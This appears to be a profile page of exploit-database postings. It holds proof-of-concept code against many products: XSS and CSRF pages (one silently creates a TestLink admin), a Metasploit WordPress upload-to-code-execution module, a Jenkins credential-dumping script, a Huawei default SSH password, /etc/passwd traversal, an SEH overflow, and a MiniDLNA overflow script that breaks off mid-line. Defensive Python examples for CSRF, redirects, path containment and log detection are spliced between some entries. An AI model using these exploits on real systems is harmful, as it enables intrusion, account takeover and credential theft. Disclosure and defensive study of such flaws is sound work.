
Everything posted by HireHackking
-
Corda .NET Redirector - 'redirector.corda' Cross-Site Scripting
source: https://www.securityfocus.com/bid/61156/info

Corda .NET Redirector is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

Corda .NET Redirector 7.3.11.6715 is vulnerable; other versions may also be affected.

http://www.example.com/Corda/redirector.corda/? () _FILEhttp://<URL>/?<script>alert('Text')</script><iframe src=http://www.example1.com></iframe>@_TEXTDESCRIPTIONEN
-
PrestaShop - Multiple Cross-Site Request Forgery Vulnerabilities
source: https://www.securityfocus.com/bid/61158/info

PrestaShop is prone to multiple cross-site request-forgery vulnerabilities.

Exploiting these issues may allow a remote attacker to perform certain unauthorized actions in the context of the affected application. Other attacks are also possible.

PrestaShop 1.5.4 is vulnerable; other versions may also be affected.

<html>
<head>
<body>
<img src="http://www.example.com/language/cart?add=&id_product=[Product ID]" width=0 height=0>
</body>
</head>
</html>
-
Arris TG1682G Modem - Persistent Cross-Site Scripting
<!--
# Exploit Title: Unauthenticated Stored Xss
# Date: 11/6/15
# Exploit Author: Nu11By73
# Vendor Homepage: comcast.net and arrisi.com
# Version: eMTA & DOCSIS Software Version: 10.0.59.SIP.PC20.CT Software Image Name:TG1682_2.0s7_PRODse Advanced Services:TG1682G Packet Cable:2.0
# Tested on: Default Install
-->
<html>
<p>Unauth Stored CSRF/XSS - Xfinity Modem</p>
<form method="POST" action="http://192.168.0.1/actionHandler/ajax_managed_services.php">
<input type="hidden" name="set" value="true" />
<input type="hidden" name="UMSStatus" value="Enabled" />
<input type="hidden" name="add" value="true" />
<input type="hidden" name="service" value="test><script>alert(1)</script>" / >
<input type="hidden" name="protocol" value="TCP" / >
<input type="hidden" name="startPort" value="1" />
<input type="hidden" name="endPort" value="2" />
<input type="hidden" name="block" value="true" />
<input type="submit" title="Enable Service" />
</form>
</html>
-
TestLink 1.9.14 - Cross-Site Request Forgery
Information
=================================
Name: CSRF Vulnerability in TestLink 1.9.14
Affected Software: TestLink
Affected Versions: 1.9.14 and possibly below
Vendor Homepage: http://testlink.org/
Severity: High
Status: Fixed

Vulnerability Type:
=================================
Cross Site Request Forgery (CSRF)

CVE Reference:
=================================
Not assigned

Technical Details:
=================================
Even though CSRF tokens are implemented in the application, they aren't properly validated on the server side. This allows malicious requests to be generated by the attacker and get them processed by the server on behalf of the victim.

By exploiting the vulnerability, the attacker will be able to create user accounts with administrator privileges on the application.

Exploit Code
=================================
<html lang="en">
<head>
<title>CSRF Exploit to Create New Administrator Account</title>
</head>
<body>
<form action="http://localhost/testlink_1_9_14/lib/usermanagement/usersEdit.php" id="formid" method="post">
<input type="hidden" name="CSRFName" value="" />
<input type="hidden" name="CSRFToken" value="" />
<input type="hidden" name="user_id" value="" />
<input type="hidden" name="user_login" value="" />
<input type="hidden" name="login" value="new_admin" />
<input type="hidden" name="firstName" value="new_administrator_fname" />
<input type="hidden" name="lastName" value="new_administrator_lname" />
<input type="hidden" name="password" value="new_administrator_password" />
<input type="hidden" name="emailAddress" value="new_administrator@admin.com" />
<input type="hidden" name="rights_id" value="8" />
<input type="hidden" name="locale" value="en_GB" />
<input type="hidden" name="authentication" value="" />
<input type="hidden" name="user_is_active" value="on" />
<input type="hidden" name="doAction" value="doCreate" />
<input type="hidden" name="do_update" value="Save" />
</form>
<script>
document.getElementById('formid').submit();
</script>
</body>
</html>

Exploitation Technique:
===================================
Remote

Severity Level:
===================================
High

Advisory Timeline
===================================
Sat, 7 Nov 2015 13:14:33 +0530 - First Contact
Sat, 7 Nov 2015 08:52:14 +0100 - Vendor Response
Sat, 7 Nov 2015 13:00:54 +0100 - Vendor Fixed
Sun, 8 Nov 2015 19:03:00 +0530 - Public Disclosure

Solution
====================================
This vulnerability is fixed in TestLink 1.9.15 (Tauriel)
Fix: https://github.com/TestLinkOpenSourceTRMS/testlink-code/commit/1cb1f78f1a50f6e6819bcbadeae345eb3213c487

Credits & Authors
====================================
Aravind C Ajayan, Balagopal N
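The advisory's PoC works because empty CSRFName/CSRFToken values are accepted. The following is an added example of the server-side check that closes that gap; it is not TestLink's code and uses a plain dict as a stand-in for the session store. It rejects a missing or empty token outright, compares the rest in constant time, binds the token to the session that issued it, and consumes it so a captured token cannot be replayed.

```python
import hmac
import secrets

# Added example, not TestLink code. The session is modelled as a dict; a real
# application would use its framework's server-side session object.


def issue_csrf_token(session, form_name):
    """Mint a fresh token for one named form and store it in the session."""
    token = secrets.token_hex(32)
    session.setdefault("csrf_tokens", {})[form_name] = token
    return token


def validate_csrf_token(session, form_name, submitted):
    """True only if a token was issued for form_name in this session and the
    submitted value matches it. The stored token is consumed on use."""
    if not form_name or not submitted:
        return False                  # absent or empty token is a failure, never a pass
    stored = session.get("csrf_tokens", {}).pop(form_name, None)
    if stored is None:
        return False                  # nothing was ever issued for this form
    return hmac.compare_digest(stored.encode(), str(submitted).encode())


def handle_user_create(session, form):
    """Simulated handler for the privileged 'create user' action: the CSRF
    check runs before anything else is looked at."""
    if not validate_csrf_token(session, form.get("CSRFName"), form.get("CSRFToken")):
        return "403 Forbidden: CSRF token check failed"
    return "201 Created: login=%s rights_id=%s" % (form.get("login"), form.get("rights_id"))


def demo():
    """Exercise the handler with a forged request carrying empty tokens (as in
    the PoC), a legitimate request, a replay of it, and a guessed token."""
    session = {}
    forged = {"CSRFName": "", "CSRFToken": "", "login": "new_admin", "rights_id": "8"}
    r_forged = handle_user_create(session, forged)

    token = issue_csrf_token(session, "usersEdit")
    legit = {"CSRFName": "usersEdit", "CSRFToken": token, "login": "alice", "rights_id": "8"}
    r_legit = handle_user_create(session, legit)
    r_replay = handle_user_create(session, legit)      # same token again: consumed, so rejected

    issue_csrf_token(session, "usersEdit")
    guessed = dict(legit, CSRFToken="0" * 64)          # wrong token of the right shape
    r_guess = handle_user_create(session, guessed)
    return r_forged, r_legit, r_replay, r_guess


if __name__ == "__main__":
    for line in demo():
        print(line)
```

The check must run before the handler reads any other field: a handler that builds the user object first and validates afterwards is one refactor away from the bug the advisory describes.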
-
POP Peeper 4.0.1 - Overwrite (SEH)
'''
********************************************************************************************
# Exploit Title: POP Peeper SEH Over-write.
# Date: 9/14/2015
# Exploit Author: Un_N0n
# Software Link: http://www.esumsoft.com/download
# Version: v4.0.1
# Tested on: Windows 7 x86(32 BIT)
********************************************************************************************

[DUMP:]
'''
EAX 00000000
ECX 20203029
EDX 77C5660D ntdll.77C5660D
EBX 00000000
ESP 0012EC5C
EBP 0012EC7C
ESI 00000000
EDI 00000000
EIP 20203029
==============================
STACK:
0012FBF4   41414141
0012FBF8   41414141
0012FBFC   41414141
0012FC00   41414141
0012FC04   41414141
0012FC08   909020EB  Pointer to next SE>
0012FC0C   20203029  SE handler
0012FC10   43434343
0012FC14   43434343
0012FC18   43434343
0012FC1C   43434343
0012FC20   43434343
0012FC24   43434343
0012FC28   43434343
===============================
'''
[Steps to Produce the Crash]:
1- Open 'POPPeeper.exe'
2- Goto Accounts->Add->CreateSingleAccount.
3- After entering the email address, the option for Account name will appear, enter the contents of crash.txt in it->Save.
4- Then compose a new mail->In TO field and Subject field, enter the contents of crash.txt
5- Save as Draft, software will crash.
6- Open up "POPPeeper.exe" again.
7- Click on Check Mail option, Software will crash.
   Every time you click on Check mail, it will crash as it will load the saved DRAFT.

[Code to produce CRASH.txt]
'''
buffer = "A"*66666
file = "crash.txt"
f = open(file,'w')
f.write(buffer)
f.close()
'''
[Extra Info:]
Offset : 2052
**********************************************************************************************
'''
-
WordPress Plugin Ajax Load More 2.8.1.1 - PHP Upload (Metasploit)
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HTTP::Wordpress
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'            => 'Wordpress Ajax Load More PHP Upload Vulnerability',
      'Description'     => %q{
        This module exploits an arbitrary file upload in the WordPress Ajax Load
        More version 2.8.1.1. It allows to upload arbitrary php files and get remote
        code execution. This module has been tested successfully on WordPress Ajax
        Load More 2.8.0 with Wordpress 4.1.3 on Ubuntu 12.04/14.04 Server.
      },
      'Author'          =>
        [
          'Unknown', # Identify yourself || send an PR here
          'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module
        ],
      'License'         => MSF_LICENSE,
      'References'      =>
        [
          ['WPVDB', '8209']
        ],
      'Privileged'      => false,
      'Platform'        => 'php',
      'Arch'            => ARCH_PHP,
      'Targets'         => [['Ajax Load More 2.8.1.1', {}]],
      'DisclosureDate'  => 'Oct 10 2015',
      'DefaultTarget'   => 0
    ))

    register_options(
      [
        OptString.new('WP_USERNAME', [true, 'A valid username', nil]),
        OptString.new('WP_PASSWORD', [true, 'Valid password for the provided username', nil])
      ], self.class
    )
  end

  def check
    check_plugin_version_from_readme('ajax-load-more', '2.8.1.2')
  end

  def username
    datastore['WP_USERNAME']
  end

  def password
    datastore['WP_PASSWORD']
  end

  def get_nonce(cookie)
    res = send_request_cgi(
      'method'    => 'GET',
      'uri'       => normalize_uri(wordpress_url_backend, 'admin.php'),
      'vars_get'  => {
        'page' => 'ajax-load-more-repeaters'
      },
      'cookie'    => cookie
    )

    if res && res.body && res.body =~ /php","alm_admin_nonce":"([a-z0-9]+)"}/
      return Regexp.last_match[1]
    else
      return nil
    end
  end

  def exploit
    vprint_status("#{peer} - Trying to login as #{username}")
    cookie = wordpress_login(username, password)
    fail_with(Failure::NoAccess, "#{peer} - Unable to login as: #{username}") if cookie.nil?

    vprint_status("#{peer} - Trying to get nonce")
    nonce = get_nonce(cookie)
    fail_with(Failure::Unknown, "#{peer} - Unable to get nonce") if nonce.nil?

    vprint_status("#{peer} - Trying to upload payload")

    # This must be default.php
    filename = 'default.php'

    print_status("#{peer} - Uploading payload")
    res = send_request_cgi(
      'method'    => 'POST',
      'uri'       => normalize_uri(wordpress_url_backend, 'admin-ajax.php'),
      'vars_post' => {
        'action'    => 'alm_save_repeater',
        'value'     => payload.encoded,
        'repeater'  => 'default',
        'type'      => 'default',
        'alias'     => '',
        'nonce'     => nonce
      },
      'cookie'    => cookie
    )

    if res
      if res.code == 200 && res.body.include?('Template Saved Successfully')
        register_files_for_cleanup(filename)
      else
        fail_with(Failure::Unknown, "#{peer} - You do not have sufficient permissions to access this page.")
      end
    else
      fail_with(Failure::Unknown, 'Server did not respond in an expected way')
    end

    print_status("#{peer} - Calling uploaded file")
    send_request_cgi(
      'uri' => normalize_uri(wordpress_url_plugins, 'ajax-load-more', 'core', 'repeater', filename)
    )
  end
end
-
Apache Struts 2.2.3 - Multiple Open Redirections
source: https://www.securityfocus.com/bid/61196/info

Apache Struts is prone to multiple open-redirection vulnerabilities because the application fails to properly sanitize user-supplied input.

An attacker can leverage these issues by constructing a crafted URI and enticing a user to follow it. When an unsuspecting victim follows the link, they may be redirected to an attacker-controlled site; this may aid in phishing attacks. Other attacks are possible.

Apache Struts 2.0.0 prior to 2.3.15.1 are vulnerable.

http://www.example.com/struts2-showcase/fileupload/upload.action?redirect:http://www.example.com/
http://www.example.com/struts2-showcase/modelDriven/modelDriven.action?redirectAction:http://www.example.com/%23
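The fix for an open redirect is to validate the target before issuing the 302. The following is an added example, not Struts code, of an allowlist check; the TRUSTED_HOSTS set is an assumption for the example. It goes beyond the two URLs in the entry and also handles the usual bypass shapes: protocol-relative targets, userinfo tricks, non-http schemes, backslashes and control characters.

```python
from urllib.parse import urlsplit

# Added example, not Struts code. TRUSTED_HOSTS is an assumed allowlist; a real
# deployment would load it from configuration.
TRUSTED_HOSTS = {"www.example.com"}


def safe_redirect_target(candidate, default="/"):
    """Return candidate if it is a site-relative path or an http(s) URL to an
    allowlisted host; otherwise return default. Never raises."""
    if not candidate:
        return default
    # Control characters enable header injection; backslashes are normalised to
    # slashes by some browsers, turning "/\evil.example" into "//evil.example".
    if any(ord(ch) < 0x20 or ch == "\x7f" for ch in candidate) or "\\" in candidate:
        return default
    parts = urlsplit(candidate)
    if parts.scheme or parts.netloc:
        # Absolute or protocol-relative URL: scheme and host must both pass.
        if parts.scheme not in ("http", "https"):
            return default
        host = (parts.hostname or "").lower()   # hostname strips userinfo and port
        if host not in TRUSTED_HOSTS:
            return default
        return candidate
    # No scheme and no authority: require a plain site-relative path and refuse
    # "//host" or "///host" forms that browsers may read as protocol-relative.
    if not candidate.startswith("/") or candidate.startswith("//"):
        return default
    return candidate


if __name__ == "__main__":
    for url in ("/account", "http://www.example.com/", "//attacker.example/x",
                "http://www.example.com@attacker.example/", "javascript:alert(1)"):
        print("%-45s -> %s" % (url, safe_redirect_target(url)))
```

Comparing `parts.hostname` rather than `parts.netloc` matters: the netloc of `http://www.example.com@attacker.example/` starts with the trusted name, but the host the browser connects to is the part after the `@`.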
-
Huawei HG630a / HG630a-50 - Default SSH Admin Password on ADSL Modems
# Exploit Title: Huawei HG630a and HG630a-50 Default SSH Admin Password on Adsl Modems
# Date: 10.11.2015
# Exploit Author: Murat Sahin (@murtshn)
# Vendor Homepage: Huawei
# Version: HG630a and HG630a-50
# Tested on: linux,windows

Adsl modems force you to change the admin web interface password. Even though you can change the admin password on the web interface, the password you assign does not apply to SSH. So the SSH password will always be 'Username:admin Password:admin'.

Ex:

*ssh admin@modemIP <admin@192.168.1.1>*
admin@modemIP <admin@192.168.1.1>'s password: *admin*
PTY allocation request failed on channel 0
------------------------------
-----Welcome to ATP Cli------
-------------------------------
ATP>?
?
cls
debug
help
save
?
exit
ATP>shell
shell
BusyBox vv1.9.1 (2013-12-31 16:16:20 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
# cat /proc/version
cat /proc/version
Linux version 2.6.30 (y00179387@localhost) (gcc version 4.4.2 (Buildroot 2010.02-git) ) #10 SMP PREEMPT Tue Dec 31 16:20:50 CST 2013
#
-
YesWiki 0.2 - 'template' Directory Traversal
# Exploit Title: YESWIKI 0.2 - Path Traversal (template param)
# Date: 2015-11-10
# Exploit Author: HaHwul
# Exploit Author Blog: http://www.codeblack.net
# Vendor Homepage: http://yeswiki.net
# Software Link: https://github.com/YesWiki/yeswiki
# Version: yeswiki 0.2
# Tested on: Debian [Wheezy] , Ubuntu
# CVE : none
# ===========================================
<!-- Open Browser: http://127.0.0.1/vul_test/yeswiki/wakka.php?wiki=HomePage/diaporama&template=/../../../../../../../../../../../../etc/passwd --><br>
# Exploit Code<br>
# ===========================================
<br><br>
<form name="yeswiki_traversal2_poc" action="http://127.0.0.1/vul_test/yeswiki/wakka.php" method="GET">
<input type="hidden" name="wiki" value="HomePage/diaporama">
Target: Edit HTML Code<br>
File: <input type="text" name="template" value="/../../../../../../../../../../../../etc/passwd"><br>
<input type="submit" value="Exploit">
</form>
<!-- Auto Submit
<script type="text/javascript">document.forms.yeswiki_traversal2_poc.submit();</script>
-->
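The defensive counterpart to a `template` parameter like the one above is to canonicalise the requested path and prove it stays under the template root before opening it. The following is an added example written for this listing, not YesWiki code; the template root, the file names and the symlink it creates are all constructed in a temporary directory so it runs stand-alone.

```python
import os
import shutil
import tempfile

# Added example, not YesWiki code. Everything under the temporary root is
# constructed for the demonstration.


def resolve_template(base_dir, requested):
    """Map an untrusted template name onto a file under base_dir.
    Returns the canonical path, or None if the request escapes the root
    (via "..", an absolute path or a symlink), names a directory, or is missing."""
    base = os.path.realpath(base_dir)
    # os.path.join discards base when `requested` is absolute, so a value such as
    # "/../../etc/passwd" resolves to /etc/passwd and fails the containment check
    # below instead of being silently re-rooted under base.
    candidate = os.path.realpath(os.path.join(base, requested))
    try:
        inside = os.path.commonpath([base, candidate]) == base
    except ValueError:              # different drives on Windows
        inside = False
    if not inside or candidate == base:
        return None
    if not os.path.isfile(candidate):
        return None
    return candidate


def demo():
    """Build a throwaway template root holding one real template and a symlink
    that points outside it, then try a legitimate name and four escape attempts."""
    root = tempfile.mkdtemp(prefix="yeswiki-tpl-")
    os.makedirs(os.path.join(root, "themes"))
    with open(os.path.join(root, "themes", "diaporama.tpl"), "w") as fh:
        fh.write("<!-- constructed template -->\n")
    outside = tempfile.NamedTemporaryFile(prefix="outside-", delete=False)
    outside.write(b"constructed secret\n")
    outside.close()
    link = os.path.join(root, "themes", "link.tpl")
    try:
        os.symlink(outside.name, link)          # symlink escaping the root
    except (OSError, NotImplementedError):
        link = None                             # platform without symlink support
    results = {
        "legit": resolve_template(root, "themes/diaporama.tpl"),
        "traversal_abs": resolve_template(root, "/../../../../../../../../../../../../etc/passwd"),
        "traversal_rel": resolve_template(root, "themes/../../" + os.path.basename(outside.name)),
        "symlink_out": resolve_template(root, "themes/link.tpl") if link else None,
        "directory": resolve_template(root, "themes"),
    }
    shutil.rmtree(root)
    os.unlink(outside.name)
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print("%-14s %s" % (name, value))
```

Note that the check is done on `realpath` output, so a symlink inside the root that points outside it is caught as well; a plain string prefix test on the unresolved path would not catch it.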
-
Jenkins 1.633 - Credential Recovery
# Exploit Title: Jenkins Unauthenticated Credential Recovery
# Disclosure Date: 10/14/2015
# Response Date: 10/14/2015
# Response: "Recommend this be rejected as a vulnerability."
# Full report including response: http://www.th3r3p0.com/vulns/jenkins/jenkinsVuln.html
# Vendor Homepage: https://jenkins-ci.org/
# Tested on: Jenkins v1.633
# Author = 'Th3R3p0' | Justin Massey
# Google Dork: intitle:"Dashboard [Jenkins]" Credentials

import requests
import re
from BeautifulSoup import BeautifulSoup
import urllib

# Usage: Modify the URL below to match the target host and port
# Must have trailing slash at end of URL
url='http://192.168.1.151:8080/'

# makes request to gather all users with stored credentials
r= requests.get(url + 'credential-store/domain/_/')
soup = BeautifulSoup(r.text)

# loop to go through all hrefs and match the regex "credential" and add the urls to the users list
users = []
for link in soup.body.findAll('a', href=True):
    m = re.match("credential", link['href'])
    if m:
        if link['href'] not in users:
            users.append(link['href'])

for users in users:
    r2 = requests.get(url + 'credential-store/domain/_/'+users+'/update')
    soup2 = BeautifulSoup(r2.text)
    # Finds the user and password value in html and stores in encPass variable
    user = soup2.body.findAll(attrs={"name" : "_.username"})[0]['value']
    encPass = soup2.body.findAll(attrs={"name" : "_.password"})[0]['value']
    # Encodes the password to www-form-urlencoded standards needed for the expected content type
    encPassEncoded = urllib.quote(encPass, safe='')
    # Script to run in groovy scripting engine to decrypt the password
    script = 'script=hudson.util.Secret.decrypt+%%27' \
             '%s'\
             '%%27&json=%%7B%%22script%%22%%3A+%%22hudson.util.Secret.decrypt+%%27' \
             '%s' \
             '%%27%%22%%2C+%%22%%22%%3A+%%22%%22%%7D&Submit=Run' % (encPassEncoded, encPassEncoded)
    # Using sessions because the POST requires a session token to be present
    with requests.Session() as s:
        r3 = s.get(url+'script')
        headers = {'content-type': 'application/x-www-form-urlencoded'}
        r3 = s.post(url+'script',data=script, headers=headers)
        soup3 = BeautifulSoup(r3.text)
        # Extracts password from body
        password = soup3.body.findAll('pre')[1].text
        password = re.sub('Result:', '', password)
        print "User: %s | Password:%s" % (user, password)
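A defender-side companion to the post above, added here and not part of it or of Jenkins: the script walks the two endpoints the PoC relies on (the credential-store listing and the script console) in front-end access logs and flags anonymous hits, plus the listing-then-console sequence that a decrypt-and-dump run produces. The log lines are constructed in NCSA combined format; the addresses, user names and the credential id in them are made up.

```python
import re
from collections import defaultdict

# Added example, not part of the original post or of Jenkins. The log lines are
# constructed in NCSA combined format (what most reverse proxies in front of
# Jenkins write); only the field positions matter.
SAMPLE_LOG = """\
10.0.0.5 - - [14/Oct/2015:10:01:02 +0000] "GET /credential-store/domain/_/ HTTP/1.1" 200 4123 "-" "python-requests/2.7.0"
10.0.0.5 - - [14/Oct/2015:10:01:03 +0000] "GET /credential-store/domain/_/credential/0c2d-EXAMPLE/update HTTP/1.1" 200 8821 "-" "python-requests/2.7.0"
10.0.0.5 - - [14/Oct/2015:10:01:04 +0000] "POST /script HTTP/1.1" 200 2210 "-" "python-requests/2.7.0"
10.0.0.7 - alice [14/Oct/2015:10:05:00 +0000] "GET /job/build-all/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.7 - alice [14/Oct/2015:10:06:00 +0000] "POST /script HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
10.0.0.9 - - [14/Oct/2015:10:07:00 +0000] "GET /login HTTP/1.1" 200 1020 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Endpoints that a hardened Jenkins never exposes to anonymous users.
SENSITIVE = (
    ("credential-store", re.compile(r"^/credential-store(/|$)")),
    ("script-console", re.compile(r"^/script(Text)?(\?|$)")),
)


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def analyse(log_text):
    """Return a list of findings. Anonymous access (user field '-') to a sensitive
    endpoint is 'high'; authenticated script-console use is 'review' because it is
    legitimate but belongs in an audit trail. A source that touches both the
    credential store and the script console gets an extra 'sequence' finding."""
    findings = []
    touched = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for name, pattern in SENSITIVE:
            if not pattern.match(rec["path"]):
                continue
            anonymous = rec["user"] == "-"
            touched[rec["ip"]].add(name)
            findings.append({
                "ip": rec["ip"], "user": rec["user"], "endpoint": name,
                "path": rec["path"], "status": rec["status"],
                "severity": "high" if anonymous else "review",
            })
    for ip, names in touched.items():
        if {"credential-store", "script-console"} <= names:
            findings.append({"ip": ip, "user": None, "endpoint": "sequence",
                             "path": None, "status": None, "severity": "high"})
    return findings


if __name__ == "__main__":
    for f in analyse(SAMPLE_LOG):
        print("%-6s %-9s %-16s %s" % (f["severity"], f["ip"], f["endpoint"], f["path"]))
```

The user field is only populated when the proxy is the component doing authentication; behind a proxy that passes Jenkins' own session through, treat every script-console hit as worth review and correlate with Jenkins' audit data instead.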
-
FreeType 2.6.1 - TrueType tt_sbit_decoder_load_bit_aligned Heap Out-of-Bounds Read
Source: https://code.google.com/p/google-security-research/issues/detail?id=614

The following heap-based out-of-bounds memory read has been encountered in FreeType. It has been reproduced with the current version of freetype2 from master git branch, with a 64-bit build of the ftbench utility compiled with AddressSanitizer:

$ ftbench <file>

Attached are three POC files which trigger the conditions.

---

$ freetype2-demos/bin/ftbench asan_heap-oob_783b6f_6837_eb01136f859a0091cb61f7beccd7059b

ftbench results for font `asan_heap-oob_783b6f_6837_eb01136f859a0091cb61f7beccd7059b'
-------------------------------------------------------------------------------------

family: (null)
style: (null)

number of seconds for each test: 2.000000
starting glyph index: 0
face size: 10ppem
font preloading into memory: no

load flags: 0x0
render mode: 0

CFF engine set to Adobe
TrueType engine set to version 35
maximum cache size: 1024KiByte

executing tests:
  Load
=================================================================
==22366==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000eb55 at pc 0x00000069e2fc bp 0x7fffc4670610 sp 0x7fffc4670608
READ of size 1 at 0x60200000eb55 thread T0
    #0 0x69e2fb in tt_sbit_decoder_load_bit_aligned freetype2/src/sfnt/ttsbit.c:834:19
    #1 0x69d214 in tt_sbit_decoder_load_bitmap freetype2/src/sfnt/ttsbit.c:1145:15
    #2 0x69b1bf in tt_sbit_decoder_load_image freetype2/src/sfnt/ttsbit.c:1340:12
    #3 0x69eee2 in tt_sbit_decoder_load_compound freetype2/src/sfnt/ttsbit.c:932:15
    #4 0x69d214 in tt_sbit_decoder_load_bitmap freetype2/src/sfnt/ttsbit.c:1145:15
    #5 0x69b1bf in tt_sbit_decoder_load_image freetype2/src/sfnt/ttsbit.c:1340:12
    #6 0x6893d2 in tt_face_load_sbit_image freetype2/src/sfnt/ttsbit.c:1506:19
    #7 0x55d265 in load_sbit_image freetype2/src/truetype/ttgload.c:2127:13
    #8 0x55bedc in TT_Load_Glyph freetype2/src/truetype/ttgload.c:2487:15
    #9 0x5301a2 in tt_glyph_load freetype2/src/truetype/ttdriver.c:396:13
    #10 0x4f18ae in FT_Load_Glyph freetype2/src/base/ftobjs.c:742:15
    #11 0x4e966e in test_load freetype2-demos/src/ftbench.c:250:13
    #12 0x4e9c3f in benchmark freetype2-demos/src/ftbench.c:216:15
    #13 0x4e80e9 in main freetype2-demos/src/ftbench.c:1058:9

0x60200000eb55 is located 0 bytes to the right of 5-byte region [0x60200000eb50,0x60200000eb55)
allocated by thread T0 here:
    #0 0x4bc4a8 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
    #1 0x756740 in ft_alloc freetype2/src/base/ftsystem.c:74:12
    #2 0x51b4e7 in ft_mem_qalloc freetype2/src/base/ftutil.c:76:15
    #3 0x51abb1 in FT_Stream_EnterFrame freetype2/src/base/ftstream.c:269:12
    #4 0x51a800 in FT_Stream_ExtractFrame freetype2/src/base/ftstream.c:200:13
    #5 0x69ccab in tt_sbit_decoder_load_bitmap freetype2/src/sfnt/ttsbit.c:1036:10
    #6 0x69b1bf in tt_sbit_decoder_load_image freetype2/src/sfnt/ttsbit.c:1340:12
    #7 0x69eee2 in tt_sbit_decoder_load_compound freetype2/src/sfnt/ttsbit.c:932:15
    #8 0x69d214 in tt_sbit_decoder_load_bitmap freetype2/src/sfnt/ttsbit.c:1145:15
    #9 0x69b1bf in tt_sbit_decoder_load_image freetype2/src/sfnt/ttsbit.c:1340:12
    #10 0x6893d2 in tt_face_load_sbit_image freetype2/src/sfnt/ttsbit.c:1506:19
    #11 0x55d265 in load_sbit_image freetype2/src/truetype/ttgload.c:2127:13
    #12 0x55bedc in TT_Load_Glyph freetype2/src/truetype/ttgload.c:2487:15
    #13 0x5301a2 in tt_glyph_load freetype2/src/truetype/ttdriver.c:396:13
    #14 0x4f18ae in FT_Load_Glyph freetype2/src/base/ftobjs.c:742:15
    #15 0x4e966e in test_load freetype2-demos/src/ftbench.c:250:13
    #16 0x4e9c3f in benchmark freetype2-demos/src/ftbench.c:216:15
    #17 0x4e80e9 in main freetype2-demos/src/ftbench.c:1058:9

SUMMARY: AddressSanitizer: heap-buffer-overflow freetype2/src/sfnt/ttsbit.c:834:19 in tt_sbit_decoder_load_bit_aligned
Shadow bytes around the buggy address:
  0x0c047fff9d10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9d20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9d30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9d40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9d50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c047fff9d60: fa fa fa fa fa fa fa fa fa fa[05]fa fa fa fd fa
  0x0c047fff9d70: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
  0x0c047fff9d80: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
  0x0c047fff9d90: fa fa fd fa fa fa 04 fa fa fa 00 fa fa fa fd fa
  0x0c047fff9da0: fa fa fd fa fa fa fd fd fa fa fd fd fa fa fd fd
  0x0c047fff9db0: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==22366==ABORTING

---

The issue was reported in https://savannah.nongnu.org/bugs/?46379.

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38662.zip
-
ReadyMedia - Remote Heap Buffer Overflow
source: https://www.securityfocus.com/bid/61282/info

ReadyMedia is prone to a remote heap-based buffer-overflow vulnerability.

Attackers can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.

ReadyMedia prior to 1.1.0 are vulnerable.

#!/usr/bin/env python
#AAAAinject.py
# Author: Zachary Cutlip
# zcutlip@tacnetsol.com
# twitter: @zcutlip
#This script injects a buffer overflow into the ALBUM_ART table of
#MiniDLNA's SQLite database. When queried with the proper soap request,
#this buffer overflow demonstrates arbitrary code execution by placing a
#string of user-controlled 'A's in the CPU's program counter. This
#affects MiniDLNA version 1.0.18 as shipped with Netgear WNDR3700 version 3.

import math
import sys
import urllib,socket,os,httplib
import time
from overflow_data import DlnaOverflowBuilder

headers={"Host":"10.10.10.1"}
host="10.10.10.1"

COUNT=8
LEN=128
empty=''
overflow_strings=[]
overflow_strings.append("AA")
overflow_strings.append("A"*LEN)
overflow_strings.append("B"*LEN)
overflow_strings.append("C"*LEN)
overflow_strings.append("D"*LEN)
overflow_strings.append("A"*LEN)
overflow_strings.append("\x10\x21\x76\x15"*(LEN/4))
overflow_strings.append("\x10\x21\x76\x15"*(LEN/4))
overflow_strings.append("D"*LEN)
overflow_strings.append("D"*LEN)
overflow_strings.append("D"*LEN)

path_beginning='/AlbumArt/1;'
path_ending='-18.jpg'

details_insert_query='insert/**/into/**/DETAILS(ID,SIZE,TITLE,ARTIST,ALBUM'+\
